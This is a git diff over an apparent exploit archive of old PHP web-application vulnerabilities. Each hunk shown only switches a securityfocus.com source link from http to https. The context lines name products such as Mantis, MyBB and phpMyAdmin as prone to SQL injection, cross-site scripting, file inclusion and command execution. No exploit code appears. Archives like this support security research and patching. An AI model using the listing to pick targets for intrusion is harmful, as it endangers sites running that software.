b/exploits/php/webapps/26159.txt index fe003ad37..3ffc8ca5e 100644 --- a/exploits/php/webapps/26159.txt +++ b/exploits/php/webapps/26159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14589/info +source: https://www.securityfocus.com/bid/14589/info PHPFreeNews is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26160.txt b/exploits/php/webapps/26160.txt index 3097be301..8e0ed0b98 100644 --- a/exploits/php/webapps/26160.txt +++ b/exploits/php/webapps/26160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14590/info +source: https://www.securityfocus.com/bid/14590/info PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26161.txt b/exploits/php/webapps/26161.txt index 91465960b..fc55e7b98 100644 --- a/exploits/php/webapps/26161.txt +++ b/exploits/php/webapps/26161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14590/info +source: https://www.securityfocus.com/bid/14590/info PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26162.txt b/exploits/php/webapps/26162.txt index 2a56f194c..5e357b9f3 100644 --- a/exploits/php/webapps/26162.txt +++ b/exploits/php/webapps/26162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26163.txt b/exploits/php/webapps/26163.txt index ff675898d..49d815763 100644 --- a/exploits/php/webapps/26163.txt +++ b/exploits/php/webapps/26163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26164.txt b/exploits/php/webapps/26164.txt index 08e04f020..4b67c45ab 100644 --- a/exploits/php/webapps/26164.txt +++ b/exploits/php/webapps/26164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26165.txt b/exploits/php/webapps/26165.txt index 9a5dfa84e..0fe1aa1ff 100644 --- a/exploits/php/webapps/26165.txt +++ b/exploits/php/webapps/26165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26166.txt b/exploits/php/webapps/26166.txt index f8145b95d..6bedc0552 100644 --- a/exploits/php/webapps/26166.txt +++ b/exploits/php/webapps/26166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26169.txt b/exploits/php/webapps/26169.txt index dcf93eb1f..fb496f373 100644 --- a/exploits/php/webapps/26169.txt +++ b/exploits/php/webapps/26169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14597/info +source: https://www.securityfocus.com/bid/14597/info W-Agora is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26170.txt b/exploits/php/webapps/26170.txt index 75b8efb2f..298946dfe 100644 --- a/exploits/php/webapps/26170.txt +++ b/exploits/php/webapps/26170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14598/info +source: https://www.securityfocus.com/bid/14598/info ATutor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26171.php b/exploits/php/webapps/26171.php index ab9d46b1a..d1418eb67 100644 --- a/exploits/php/webapps/26171.php +++ b/exploits/php/webapps/26171.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14601/info +source: https://www.securityfocus.com/bid/14601/info Zorum is prone to an arbitrary command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26172.txt b/exploits/php/webapps/26172.txt index 2f2e1c7a8..2147a4aa9 100644 --- a/exploits/php/webapps/26172.txt +++ b/exploits/php/webapps/26172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14604/info +source: https://www.securityfocus.com/bid/14604/info Mantis is prone to multiple input validation vulnerabilities. These issues involve cross-site scripting, HTML injection and variable poisoning, and are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26176.txt b/exploits/php/webapps/26176.txt index e4e5a16d4..7dbacc50d 100644 --- a/exploits/php/webapps/26176.txt +++ b/exploits/php/webapps/26176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14617/info +source: https://www.securityfocus.com/bid/14617/info Woltlab Burning Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26177.txt b/exploits/php/webapps/26177.txt index 7eb939e7e..68d3eafd8 100644 --- a/exploits/php/webapps/26177.txt +++ b/exploits/php/webapps/26177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26178.txt b/exploits/php/webapps/26178.txt index e4d78268d..d6f843b7c 100644 --- a/exploits/php/webapps/26178.txt +++ b/exploits/php/webapps/26178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26179.txt b/exploits/php/webapps/26179.txt index deae52ff2..607e38ac0 100644 --- a/exploits/php/webapps/26179.txt +++ b/exploits/php/webapps/26179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26180.txt b/exploits/php/webapps/26180.txt index b881d1fe2..e471768b9 100644 --- a/exploits/php/webapps/26180.txt +++ b/exploits/php/webapps/26180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26181.txt b/exploits/php/webapps/26181.txt index dd0c2d17b..a0da210b9 100644 --- a/exploits/php/webapps/26181.txt +++ b/exploits/php/webapps/26181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14619/info +source: https://www.securityfocus.com/bid/14619/info Land Down Under is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26182.txt b/exploits/php/webapps/26182.txt index fd553ad8b..07e97723e 100644 --- a/exploits/php/webapps/26182.txt +++ b/exploits/php/webapps/26182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14619/info +source: https://www.securityfocus.com/bid/14619/info Land Down Under is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26183.txt b/exploits/php/webapps/26183.txt index fd9cea342..6c791e7d7 100644 --- a/exploits/php/webapps/26183.txt +++ b/exploits/php/webapps/26183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14626/info +source: https://www.securityfocus.com/bid/14626/info nePHP is prone to a cross-site scripting vulnerability. This issue is due to a lack of sanitization of user-supplied input. diff --git a/exploits/php/webapps/26184.txt b/exploits/php/webapps/26184.txt index cd4b92438..080d1c1ad 100644 --- a/exploits/php/webapps/26184.txt +++ b/exploits/php/webapps/26184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14629/info +source: https://www.securityfocus.com/bid/14629/info PHPKit is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26186.txt b/exploits/php/webapps/26186.txt index 19ebd4cee..72acec2a8 100644 --- a/exploits/php/webapps/26186.txt +++ b/exploits/php/webapps/26186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14631/info +source: https://www.securityfocus.com/bid/14631/info RunCMS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26187.txt b/exploits/php/webapps/26187.txt index a05509680..36bbe2365 100644 --- a/exploits/php/webapps/26187.txt +++ b/exploits/php/webapps/26187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14635/info +source: https://www.securityfocus.com/bid/14635/info PostNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26188.txt b/exploits/php/webapps/26188.txt index 4e1a8549d..7e11c7687 100644 --- a/exploits/php/webapps/26188.txt +++ b/exploits/php/webapps/26188.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14635/info +source: https://www.securityfocus.com/bid/14635/info PostNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26189.txt b/exploits/php/webapps/26189.txt index 8ba90c34a..bea178c2f 100644 --- a/exploits/php/webapps/26189.txt +++ b/exploits/php/webapps/26189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14636/info +source: https://www.securityfocus.com/bid/14636/info PostNuke is prone to an SQL injection vulnerability. This issue is due to a lack of sufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/26190.txt b/exploits/php/webapps/26190.txt index ca747b605..55af7477a 100644 --- a/exploits/php/webapps/26190.txt +++ b/exploits/php/webapps/26190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14639/info +source: https://www.securityfocus.com/bid/14639/info SaveWebPortal is prone to an unauthorized access vulnerability. This issue is due to a failure in the application to limit access to administrative scripts. diff --git a/exploits/php/webapps/26191.txt b/exploits/php/webapps/26191.txt index ceafed378..deb237c01 100644 --- a/exploits/php/webapps/26191.txt +++ b/exploits/php/webapps/26191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14641/info +source: https://www.securityfocus.com/bid/14641/info SaveWebPortal is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26192.txt b/exploits/php/webapps/26192.txt index ba609591f..472ea0809 100644 --- a/exploits/php/webapps/26192.txt +++ b/exploits/php/webapps/26192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14642/info +source: https://www.securityfocus.com/bid/14642/info SaveWebPortal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26193.txt b/exploits/php/webapps/26193.txt index e611de7b6..87452d1d2 100644 --- a/exploits/php/webapps/26193.txt +++ b/exploits/php/webapps/26193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14643/info +source: https://www.securityfocus.com/bid/14643/info SaveWebPortal is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26197.txt b/exploits/php/webapps/26197.txt index 2ece52cc4..35460abba 100644 --- a/exploits/php/webapps/26197.txt +++ b/exploits/php/webapps/26197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14658/info +source: https://www.securityfocus.com/bid/14658/info Foojan PHPWeblog is prone to an HTML injection vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26199.txt b/exploits/php/webapps/26199.txt index 889b3ac7b..5fa12be0e 100644 --- a/exploits/php/webapps/26199.txt +++ b/exploits/php/webapps/26199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14675/info +source: https://www.securityfocus.com/bid/14675/info phpMyAdmin is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/26200.txt b/exploits/php/webapps/26200.txt index b19c36266..b0b67844e 100644 --- a/exploits/php/webapps/26200.txt +++ b/exploits/php/webapps/26200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14676/info +source: https://www.securityfocus.com/bid/14676/info SqWebMail is affected by a vulnerability that may allow remote attackers to inject and execute arbitrary script code in a user's browser. diff --git a/exploits/php/webapps/26201.txt b/exploits/php/webapps/26201.txt index 2483965a5..2bcb56eb2 100644 --- a/exploits/php/webapps/26201.txt +++ b/exploits/php/webapps/26201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14679/info +source: https://www.securityfocus.com/bid/14679/info phpWebNotes is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/26202.txt b/exploits/php/webapps/26202.txt index f7101858f..20a049cb4 100644 --- a/exploits/php/webapps/26202.txt +++ b/exploits/php/webapps/26202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14680/info +source: https://www.securityfocus.com/bid/14680/info Looking Glass is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/26203.php b/exploits/php/webapps/26203.php index 78c52e023..1468bce5e 100644 --- a/exploits/php/webapps/26203.php +++ b/exploits/php/webapps/26203.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14682/info +source: https://www.securityfocus.com/bid/14682/info Looking Glass may be exploited to execute arbitrary commands. diff --git a/exploits/php/webapps/26204.pl b/exploits/php/webapps/26204.pl index db953ef75..a4001fd9b 100755 --- a/exploits/php/webapps/26204.pl +++ b/exploits/php/webapps/26204.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14684/info +source: https://www.securityfocus.com/bid/14684/info MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26205.txt b/exploits/php/webapps/26205.txt index db2f270a0..60e9c99b7 100644 --- a/exploits/php/webapps/26205.txt +++ b/exploits/php/webapps/26205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14685/info +source: https://www.securityfocus.com/bid/14685/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26206.txt b/exploits/php/webapps/26206.txt index 2a6da8f00..d579a0afe 100644 --- a/exploits/php/webapps/26206.txt +++ b/exploits/php/webapps/26206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14685/info +source: https://www.securityfocus.com/bid/14685/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26207.txt b/exploits/php/webapps/26207.txt index 8db45b16f..0804ecc20 100644 --- a/exploits/php/webapps/26207.txt +++ b/exploits/php/webapps/26207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14685/info +source: https://www.securityfocus.com/bid/14685/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26208.txt b/exploits/php/webapps/26208.txt index 0790fef83..9fd6abb3c 100644 --- a/exploits/php/webapps/26208.txt +++ b/exploits/php/webapps/26208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14686/info +source: https://www.securityfocus.com/bid/14686/info AutoLinks Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26209.txt b/exploits/php/webapps/26209.txt index 84753f4bc..9fe9201c2 100644 --- a/exploits/php/webapps/26209.txt +++ b/exploits/php/webapps/26209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14688/info +source: https://www.securityfocus.com/bid/14688/info PHP-Fusion is prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26211.txt b/exploits/php/webapps/26211.txt index ec3acc5f3..eaea309ee 100644 --- a/exploits/php/webapps/26211.txt +++ b/exploits/php/webapps/26211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14695/info +source: https://www.securityfocus.com/bid/14695/info phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26212.txt b/exploits/php/webapps/26212.txt index 7cea3b75d..01d54678e 100644 --- a/exploits/php/webapps/26212.txt +++ b/exploits/php/webapps/26212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14702/info +source: https://www.securityfocus.com/bid/14702/info FlatNuke is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26215.txt b/exploits/php/webapps/26215.txt index 02c648032..cf177b39c 100644 --- a/exploits/php/webapps/26215.txt +++ b/exploits/php/webapps/26215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14704/info +source: https://www.securityfocus.com/bid/14704/info FlatNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26217.html b/exploits/php/webapps/26217.html index 7e1b23d0f..5b9985f7c 100644 --- a/exploits/php/webapps/26217.html +++ b/exploits/php/webapps/26217.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14709/info +source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26223.txt b/exploits/php/webapps/26223.txt index b4957acd8..922c5e2e4 100644 --- a/exploits/php/webapps/26223.txt +++ b/exploits/php/webapps/26223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14746/info +source: https://www.securityfocus.com/bid/14746/info Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26224.txt b/exploits/php/webapps/26224.txt index d0273b1c0..6cb183cc0 100644 --- a/exploits/php/webapps/26224.txt +++ b/exploits/php/webapps/26224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14748/info +source: https://www.securityfocus.com/bid/14748/info Unclassified NewsBoard is prone to an HTML injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26225.txt b/exploits/php/webapps/26225.txt index cf693d36b..53941f154 100644 --- a/exploits/php/webapps/26225.txt +++ b/exploits/php/webapps/26225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14750/info +source: https://www.securityfocus.com/bid/14750/info MAXdev MD-Pro is prone to an arbitrary remote file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26226.txt b/exploits/php/webapps/26226.txt index 16934f12c..fd098df68 100644 --- a/exploits/php/webapps/26226.txt +++ b/exploits/php/webapps/26226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14751/info +source: https://www.securityfocus.com/bid/14751/info MAXdev MD-Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26228.txt b/exploits/php/webapps/26228.txt index b6cf651eb..dd4240345 100644 --- a/exploits/php/webapps/26228.txt +++ b/exploits/php/webapps/26228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14762/info +source: https://www.securityfocus.com/bid/14762/info MyBulletinBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26229.txt b/exploits/php/webapps/26229.txt index 734bd779b..0f623a737 100644 --- a/exploits/php/webapps/26229.txt +++ b/exploits/php/webapps/26229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14763/info +source: https://www.securityfocus.com/bid/14763/info phpCommunityCalendar is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before being used in SQL queries. diff --git a/exploits/php/webapps/26231.txt b/exploits/php/webapps/26231.txt index 63bcf95cb..15d31bdc5 100644 --- a/exploits/php/webapps/26231.txt +++ b/exploits/php/webapps/26231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14765/info +source: https://www.securityfocus.com/bid/14765/info PBLang is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26232.txt b/exploits/php/webapps/26232.txt index 7618297d3..dc8955224 100644 --- a/exploits/php/webapps/26232.txt +++ b/exploits/php/webapps/26232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14767/info +source: https://www.securityfocus.com/bid/14767/info phpCommunityCalendar is prone to multiple remote cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26234.txt b/exploits/php/webapps/26234.txt index bfaf9b905..92cb1968e 100644 --- a/exploits/php/webapps/26234.txt +++ b/exploits/php/webapps/26234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14776/info +source: https://www.securityfocus.com/bid/14776/info WEB//NEWS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26235.txt b/exploits/php/webapps/26235.txt index 5e2d7548e..bed3ec1aa 100644 --- a/exploits/php/webapps/26235.txt +++ b/exploits/php/webapps/26235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14776/info +source: https://www.securityfocus.com/bid/14776/info WEB//NEWS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26236.txt b/exploits/php/webapps/26236.txt index c6c83231b..80b56cee4 100644 --- a/exploits/php/webapps/26236.txt +++ b/exploits/php/webapps/26236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14776/info +source: https://www.securityfocus.com/bid/14776/info WEB//NEWS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26237.txt b/exploits/php/webapps/26237.txt index 1d22274bf..95cc951c5 100644 --- a/exploits/php/webapps/26237.txt +++ b/exploits/php/webapps/26237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14777/info +source: https://www.securityfocus.com/bid/14777/info aMember is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/26247.txt b/exploits/php/webapps/26247.txt index 9516aeb72..11524d179 100644 --- a/exploits/php/webapps/26247.txt +++ b/exploits/php/webapps/26247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14786/info +source: https://www.securityfocus.com/bid/14786/info MyBulletinBoard is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26252.txt b/exploits/php/webapps/26252.txt index f9962aadc..54bd8e6fb 100644 --- a/exploits/php/webapps/26252.txt +++ b/exploits/php/webapps/26252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14817/info +source: https://www.securityfocus.com/bid/14817/info Subscribe Me Pro is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26253.txt b/exploits/php/webapps/26253.txt index 8ec9960b3..dfee58b53 100644 --- a/exploits/php/webapps/26253.txt +++ b/exploits/php/webapps/26253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14820/info +source: https://www.securityfocus.com/bid/14820/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26254.txt b/exploits/php/webapps/26254.txt index 5d8279cc3..f02a5b2ed 100644 --- a/exploits/php/webapps/26254.txt +++ b/exploits/php/webapps/26254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14820/info +source: https://www.securityfocus.com/bid/14820/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26255.php b/exploits/php/webapps/26255.php index e7b234fef..c77d34d5b 100644 --- a/exploits/php/webapps/26255.php +++ b/exploits/php/webapps/26255.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14821/info +source: https://www.securityfocus.com/bid/14821/info Mail-it Now! Upload2Server is prone to an arbitrary file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before uploading files. diff --git a/exploits/php/webapps/26257.txt b/exploits/php/webapps/26257.txt index 5476b0b6f..f8a366446 100644 --- a/exploits/php/webapps/26257.txt +++ b/exploits/php/webapps/26257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14831/info +source: https://www.securityfocus.com/bid/14831/info ATutor is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26258.txt b/exploits/php/webapps/26258.txt index 8b7c2a590..006f1fa7f 100644 --- a/exploits/php/webapps/26258.txt +++ b/exploits/php/webapps/26258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14832/info +source: https://www.securityfocus.com/bid/14832/info ATutor is prone to a remote information disclosure vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged information. diff --git a/exploits/php/webapps/26259.txt b/exploits/php/webapps/26259.txt index cd5fdd57d..58f541b57 100644 --- a/exploits/php/webapps/26259.txt +++ b/exploits/php/webapps/26259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14833/info +source: https://www.securityfocus.com/bid/14833/info Noah's Classifieds is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26260.txt b/exploits/php/webapps/26260.txt index 0cdc157cf..650aa246d 100644 --- a/exploits/php/webapps/26260.txt +++ b/exploits/php/webapps/26260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14834/info +source: https://www.securityfocus.com/bid/14834/info A remote command execution vulnerability affects the application. diff --git a/exploits/php/webapps/26261.txt b/exploits/php/webapps/26261.txt index 286e83fa5..a2ce9c79b 100644 --- a/exploits/php/webapps/26261.txt +++ b/exploits/php/webapps/26261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14835/info +source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26262.txt b/exploits/php/webapps/26262.txt index 3841dec31..ceee253df 100644 --- a/exploits/php/webapps/26262.txt +++ b/exploits/php/webapps/26262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14843/info +source: https://www.securityfocus.com/bid/14843/info Digital Scribe is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26263.txt b/exploits/php/webapps/26263.txt index 2c1aa0bf0..aeb2c4dcb 100644 --- a/exploits/php/webapps/26263.txt +++ b/exploits/php/webapps/26263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14847/info +source: https://www.securityfocus.com/bid/14847/info AEwebworks aeDating is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before it is used in an SQL query. diff --git a/exploits/php/webapps/26264.txt b/exploits/php/webapps/26264.txt index aaceb1f27..f453ed8e0 100644 --- a/exploits/php/webapps/26264.txt +++ b/exploits/php/webapps/26264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26265.txt b/exploits/php/webapps/26265.txt index 55662b97b..afe4ff94b 100644 --- a/exploits/php/webapps/26265.txt +++ b/exploits/php/webapps/26265.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26266.txt b/exploits/php/webapps/26266.txt index 88c895a90..061e92c9b 100644 --- a/exploits/php/webapps/26266.txt +++ b/exploits/php/webapps/26266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26267.txt b/exploits/php/webapps/26267.txt 